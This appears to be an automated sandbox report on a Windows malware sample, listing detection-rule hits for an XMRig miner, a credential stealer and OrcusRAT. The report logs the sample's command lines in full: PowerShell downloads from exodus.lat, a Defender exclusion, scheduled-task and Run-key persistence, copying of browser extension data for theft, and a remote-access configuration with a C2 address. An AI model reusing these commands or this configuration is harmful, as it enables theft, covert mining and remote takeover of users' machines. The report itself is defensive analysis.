00000035.00000002.4579522041.000001F79AD72000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
00000035.00000002.4579522041.000001F79AD72000.00000004.00000800.00020000.00000000.sdmp | MacOS_Cryptominer_Xmrig_241780a1 | unknown | unknown
  • 0x463d0:$a1: mining.set_target
  • 0x40ea0:$a2: XMRIG_HOSTNAME
  • 0x42f78:$a3: Usage: xmrig [OPTIONS]
  • 0x40e78:$a4: XMRIG_VERSION
0000002B.00000002.3921696825.000000000050E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0000002C.00000002.3922955190.0000000002820000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
(37 further entries not shown)

Yara matches, unpacked PEs (Source | Rule | Description | Author):
47.0.COMSurrogate.exe.1ee64180000.0.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
31.0.smartscreen.exe.1eb2ab20000.0.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
22.2.RegAsm.exe.3c9d977.2.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
22.2.RegAsm.exe.3c9d977.2.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
22.2.RegAsm.exe.3c7491a.3.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
(14 further entries not shown)

Yara matches, AMSI buffers (Source | Rule | Description | Author):
amsi32_6596.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
amsi32_7160.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security

                                  System Summary

Source: Process started | Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems) | Data: Command: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe, ParentCommandLine: Dr.com B, ParentImage: C:\Users\user\AppData\Local\Temp\491505\Dr.com, ParentProcessId: 4632, ParentProcessName: Dr.com, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe, ProcessId: 6884, ProcessName: RegAsm.exe
Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe, ProcessId: 6884, TargetFilename: C:\Users\user\AppData\Local\Temp\smartscreen.exe
Source: Process started | Author: Jonathan Cheong, oscd.community | Data: Command: cmd /c schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, CommandLine: cmd /c schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: Dr.com B, ParentImage: C:\Users\user\AppData\Local\Temp\491505\Dr.com, ParentProcessId: 4632, ParentProcessName: Dr.com, ProcessCommandLine: cmd /c schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, ProcessId: 616, ProcessName: cmd.exe
Source: Registry Key set | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing | Data: Details: C:\Users\user\AppData\Local\Temp\smartscreen.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\smartscreen.exe, ProcessId: 712, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SmartScreen
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\asm'", CommandLine: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\asm'", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\download.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6352, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\asm'", ProcessId: 1020, ProcessName: powershell.exe
Source: File created | Author: Subhash Popuri (@pbssubhash) | Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6920, TargetFilename: C:\Users\user\AppData\Local\Temp\downloaded_script.bat
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, CommandLine: schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 616, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, ProcessId: 4052, ProcessName: schtasks.exe
Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems) | Data: Command: powershell -Command "Invoke-WebRequest -Uri 'https://exodus.lat/ss.bat' -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_script.bat' -UseBasicParsing", CommandLine: powershell -Command "Invoke-WebRequest -Uri 'https://exodus.lat/ss.bat' -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_script.bat' -UseBasicParsing", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\runsteal.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3928, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri 'https://exodus.lat/ss.bat' -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_script.bat' -UseBasicParsing", ProcessId: 6920, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton | Data: Command: powershell -Command "Invoke-WebRequest -Uri 'https://exodus.lat/ss.bat' -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_script.bat' -UseBasicParsing", CommandLine: powershell -Command "Invoke-WebRequest -Uri 'https://exodus.lat/ss.bat' -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_script.bat' -UseBasicParsing", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\runsteal.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3928, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri 'https://exodus.lat/ss.bat' -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_script.bat' -UseBasicParsing", ProcessId: 6920, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali | Data: Command: "C:\Users\user\AppData\Local\Temp\smartscreen.exe" , CommandLine: "C:\Users\user\AppData\Local\Temp\smartscreen.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\smartscreen.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\smartscreen.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\smartscreen.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe, ParentImage: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe, ParentProcessId: 6884, ParentProcessName: RegAsm.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\smartscreen.exe" , ProcessId: 712, ProcessName: smartscreen.exe
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1064, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js", ProcessId: 1224, ProcessName: wscript.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Local\Temp\smartscreen.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\smartscreen.exe, ProcessId: 712, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SmartScreen
Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems), frack113 | Data: Command: powershell -command "Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\ArchiveContents\*' -DestinationPath 'C:\Users\user\AppData\Local\Temp\N_user_8.46.123.228.zip'", CommandLine: powershell -command "Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\ArchiveContents\*' -DestinationPath 'C:\Users\user\AppData\Local\Temp\N_user_8.46.123.228.zip'", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /c "C:\Users\user\AppData\Local\Temp\downloaded_script.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6328, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -command "Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\ArchiveContents\*' -DestinationPath 'C:\Users\user\AppData\Local\Temp\N_user_8.46.123.228.zip'", ProcessId: 1924, ProcessName: powershell.exe
Source: File created | Author: Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe, ProcessId: 6884, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o0b3f1db.zik.ps1
Source: File created | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6920, TargetFilename: C:\Users\user\AppData\Local\Temp\downloaded_script.bat
Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems) | Data: Command: xcopy /E /I "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\*" "C:\Users\user\AppData\Local\Temp\ArchiveContents\Chrome\" , CommandLine: xcopy /E /I "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\*" "C:\Users\user\AppData\Local\Temp\ArchiveContents\Chrome\" , CommandLine|base64offset|contains: ), Image: C:\Windows\SysWOW64\xcopy.exe, NewProcessName: C:\Windows\SysWOW64\xcopy.exe, OriginalFileName: C:\Windows\SysWOW64\xcopy.exe, ParentCommandLine: cmd.exe /c "C:\Users\user\AppData\Local\Temp\downloaded_script.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6328, ParentProcessName: cmd.exe, ProcessCommandLine: xcopy /E /I "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\*" "C:\Users\user\AppData\Local\Temp\ArchiveContents\Chrome\" , ProcessId: 6556, ProcessName: xcopy.exe
Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems) | Data: Command: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe, ParentCommandLine: Dr.com B, ParentImage: C:\Users\user\AppData\Local\Temp\491505\Dr.com, ParentProcessId: 4632, ParentProcessName: Dr.com, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe, ProcessId: 6884, ProcessName: RegAsm.exe
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe') }", CommandLine: powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe') }", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\download.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6352, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe') }", ProcessId: 6596, ProcessName: powershell.exe
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri 'https://exodus.lat/ss.bat' -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_script.bat' -UseBasicParsing", CommandLine: powershell -Command "Invoke-WebRequest -Uri 'https://exodus.lat/ss.bat' -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_script.bat' -UseBasicParsing", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\runsteal.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3928, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri 'https://exodus.lat/ss.bat' -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_script.bat' -UseBasicParsing", ProcessId: 6920, ProcessName: powershell.exe
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\asm'", CommandLine: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\asm'", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\download.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6352, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\asm'", ProcessId: 1020, ProcessName: powershell.exe
                                  Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\491505\Dr.com, ProcessId: 4632, TargetFilename: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "ApolloPro" /tr "wscript //B 'C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc onlogon /F /RL HIGHEST, CommandLine: schtasks.exe /create /tn "ApolloPro" /tr "wscript //B 'C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc onlogon /F /RL HIGHEST, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: Dr.com B, ParentImage: C:\Users\user\AppData\Local\Temp\491505\Dr.com, ParentProcessId: 4632, ParentProcessName: Dr.com, ProcessCommandLine: schtasks.exe /create /tn "ApolloPro" /tr "wscript //B 'C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc onlogon /F /RL HIGHEST, ProcessId: 3632, ProcessName: schtasks.exe
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Audit Audit.cmd && Audit.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Audit Audit.cmd && Audit.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\DM6vAAgoCw.exe", ParentImage: C:\Users\user\Desktop\DM6vAAgoCw.exe, ParentProcessId: 3420, ParentProcessName: DM6vAAgoCw.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Audit Audit.cmd && Audit.cmd, ProcessId: 4188, ProcessName: cmd.exe
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, CommandLine: schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 616, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, ProcessId: 4052, ProcessName: schtasks.exe
                                  Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\491505\Dr.com, ProcessId: 4632, TargetFilename: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr
                                  Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -Command "Invoke-WebRequest -Uri 'https://exodus.lat/ss.bat' -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_script.bat' -UseBasicParsing", CommandLine: powershell -Command "Invoke-WebRequest -Uri 'https://exodus.lat/ss.bat' -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_script.bat' -UseBasicParsing", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\runsteal.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3928, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri 'https://exodus.lat/ss.bat' -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_script.bat' -UseBasicParsing", ProcessId: 6920, ProcessName: powershell.exe
                                  Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1064, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js", ProcessId: 1224, ProcessName: wscript.exe
                                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\asm'", CommandLine: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\asm'", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\download.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6352, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\asm'", ProcessId: 1020, ProcessName: powershell.exe

                                  HIPS / PFW / Operating System Protection Evasion

                                  Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Audit Audit.cmd && Audit.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4188, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 5368, ProcessName: findstr.exe
                                  No Suricata rule has matched


                                  AV Detection

                                  Source: https://exodus.lat/ss.bat, Avira URL Cloud: Label: malware
                                  Source: https://exodus.lat/COMSurrogate.exe, Avira URL Cloud: Label: malware
                                  Source: C:\Users\user\AppData\Local\asm\mi.exe, Avira: detection malicious, Label: HEUR/AGEN.1311679
                                  Source: 22.2.RegAsm.exe.7c0000.0.unpack, Malware Configuration Extractor: OrcusRAT {"AutostartBuilderProperty": {"AutostartMethod": "Disable", "TaskSchedulerTaskName": "Orcus", "TaskHighestPrivileges": "true", "RegistryHiddenStart": "true", "RegistryKeyName": "Orcus", "TryAllAutostartMethodsOnFail": "true"}, "ChangeAssemblyInformationBuilderProperty": {"ChangeAssemblyInformation": "false", "AssemblyTitle": null, "AssemblyDescription": null, "AssemblyCompanyName": null, "AssemblyProductName": null, "AssemblyCopyright": null, "AssemblyTrademarks": null, "AssemblyProductVersion": "1.0.0.0", "AssemblyFileVersion": "1.0.0.0"}, "ChangeCreationDateBuilderProperty": {"IsEnabled": "false", "NewCreationDate": "2024-11-27T14:29:12"}, "ChangeIconBuilderProperty": {"ChangeIcon": "false", "IconPath": null}, "ClientTagBuilderProperty": {"ClientTag": null}, "ConnectionBuilderProperty": {"IpAddresses": [{"Ip": "45.74.38.211", "Port": "4782"}]}, "DataFolderBuilderProperty": {"Path": "%appdata%\\Orcus"}, "DefaultPrivilegesBuilderProperty": {"RequireAdministratorRights": "false"}, "DisableInstallationPromptBuilderProperty": {"IsDisabled": "true"}, "FrameworkVersionBuilderProperty": {"FrameworkVersion": "NET45"}, "HideFileBuilderProperty": {"HideFile": "false"}, "InstallationLocationBuilderProperty": {"Path": "%programfiles%\\Orcus\\Orcus.exe"}, "InstallBuilderProperty": {"Install": "false"}, "KeyloggerBuilderProperty": {"IsEnabled": "false"}, "MutexBuilderProperty": {"Mutex": "7a9c0f279c464958aebbd585f20f1cf2"}, "ProxyBuilderProperty": {"ProxyOption": "None", "ProxyAddress": null, "ProxyPort": "1080", "ProxyType": "2"}, "ReconnectDelayProperty": {"Delay": "10000"}, "RequireAdministratorPrivilegesInstallerBuilderProperty": {"RequireAdministratorPrivileges": "true"}, "RespawnTaskBuilderProperty": {"IsEnabled": "false", "TaskName": "Orcus Respawner"}, "ServiceBuilderProperty": {"Install": "false"}, "SetRunProgramAsAdminFlagBuilderProperty": {"SetFlag": "false"}, "WatchdogBuilderProperty": {"IsEnabled": "false", "Name": "OrcusWatchdog.exe", "WatchdogLocation": "AppData", "PreventFileDeletion": "false"}}
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exe, ReversingLabs: Detection: 42%
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe, ReversingLabs: Detection: 70%
                                  Source: C:\Users\user\AppData\Local\asm\mi.exe, ReversingLabs: Detection: 63%
                                  Source: DM6vAAgoCw.exe, ReversingLabs: Detection: 31%
                                  Source: DM6vAAgoCw.exe, Virustotal: Detection: 30%
                                  Source: Submitted Sample, Integrated Neural Analysis Model: Matched 95.1% probability
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exe, Joe Sandbox ML: detected
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe, Joe Sandbox ML: detected
                                  Source: C:\Users\user\AppData\Local\asm\mi.exe, Joe Sandbox ML: detected

                                  Bitcoin Miner

                                  Source: Yara match, File source: 55.2.COMSurrogate.exe.2749fd31a78.0.raw.unpack, type: UNPACKEDPE
                                  Source: Yara match, File source: 53.2.COMSurrogate.exe.1f79a831a78.2.unpack, type: UNPACKEDPE
                                  Source: Yara match, File source: 47.2.COMSurrogate.exe.1ee7638f4b0.1.unpack, type: UNPACKEDPE
                                  Source: Yara match, File source: 53.2.COMSurrogate.exe.1f79ae4f4b0.0.unpack, type: UNPACKEDPE
                                  Source: Yara match, File source: 00000035.00000002.4579522041.000001F79AD72000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara match, File source: 00000035.00000002.4579522041.000001F79B391000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara match, File source: 00000035.00000002.4579522041.000001F79B454000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
